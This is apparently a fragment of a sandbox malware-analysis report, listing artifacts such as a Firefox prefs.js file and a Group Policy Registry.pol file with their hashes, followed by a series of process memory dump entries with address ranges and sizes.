C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\prefs.js

Filesize
7KB

MD5
1475939a5c72e12b9f36f51aed241966

SHA1
05b400c5da57ce229c70e69dec55f3a8d679d643

SHA256
70325746fd996f00db248114ff10ed9d2006ef893b89a399cdf2d1ebbe7ae98c

SHA512
c17d491657bbee3a60bce593029cc60a2c3dbcf11e2f7e292df249818bd1bc93106d668a552c844441d42936b833b2c2551645e23c171bc950c39949a9424aec

Download Submit
C:\Windows\System32\GroupPolicy\Machine\Registry.pol

Filesize
7KB

MD5
1a09f4a30d75d89e0c15d2a812ef3fb7

SHA1
944456bf528a146a7c03058387aa6bbe65b7c4ac

SHA256
4b21e5e0ed715477c76aad333b644bdc7af28ef22d5bc75952a166b21690d6dd

SHA512
d8eef9edecc7e72ce262289059715c54c76108eaa9546b85bd7d82d09bf22a3b659eeb89ea50a6f931284fea617c69ad0388d7eace5ee459388dbc7bdd0669ed

Download Submit
memory/2224-16-0x00000000061F0000-0x000000000623C000-memory.dmp

Filesize
304KB

Download
memory/2224-15-0x00000000061A0000-0x00000000061BE000-memory.dmp

Filesize
120KB

Download
memory/2224-1-0x0000000005290000-0x00000000058B8000-memory.dmp

Filesize
6.2MB

Download
memory/2224-2-0x0000000005920000-0x0000000005942000-memory.dmp

Filesize
136KB

Download
memory/2224-3-0x0000000005AC0000-0x0000000005B26000-memory.dmp

Filesize
408KB

Download
memory/2224-4-0x0000000005B30000-0x0000000005B96000-memory.dmp

Filesize
408KB

Download
memory/2224-14-0x0000000005BA0000-0x0000000005EF4000-memory.dmp

Filesize
3.3MB

Download
memory/2224-20-0x00000000079C0000-0x0000000007F64000-memory.dmp

Filesize
5.6MB

Download
memory/2224-0-0x00000000028C0000-0x00000000028F6000-memory.dmp

Filesize
216KB

Download
memory/2224-19-0x00000000066E0000-0x0000000006702000-memory.dmp

Filesize
136KB

Download
memory/2224-18-0x0000000006690000-0x00000000066AA000-memory.dmp

Filesize
104KB

Download
memory/2224-17-0x0000000007370000-0x0000000007406000-memory.dmp

Filesize
600KB

Download
memory/2408-49-0x0000000005B10000-0x0000000005E64000-memory.dmp

Filesize
3.3MB

Download
memory/3368-54-0x0000028DE0410000-0x0000028DE0432000-memory.dmp

Filesize
136KB

Download
memory/4388-119-0x0000000004A50000-0x0000000004AB5000-memory.dmp

Filesize
404KB

Download
memory/4388-75-0x0000000004500000-0x0000000004585000-memory.dmp

Filesize
532KB

Download
memory/4388-23-0x0000000010000000-0x00000000105D3000-memory.dmp

Filesize
5.8MB

Download
memory/4860-38-0x0000000006770000-0x00000000067BC000-memory.dmp

Filesize
304KB

Download
memory/4860-36-0x0000000005CC0000-0x0000000006014000-memory.dmp

Filesize
3.3MB

Download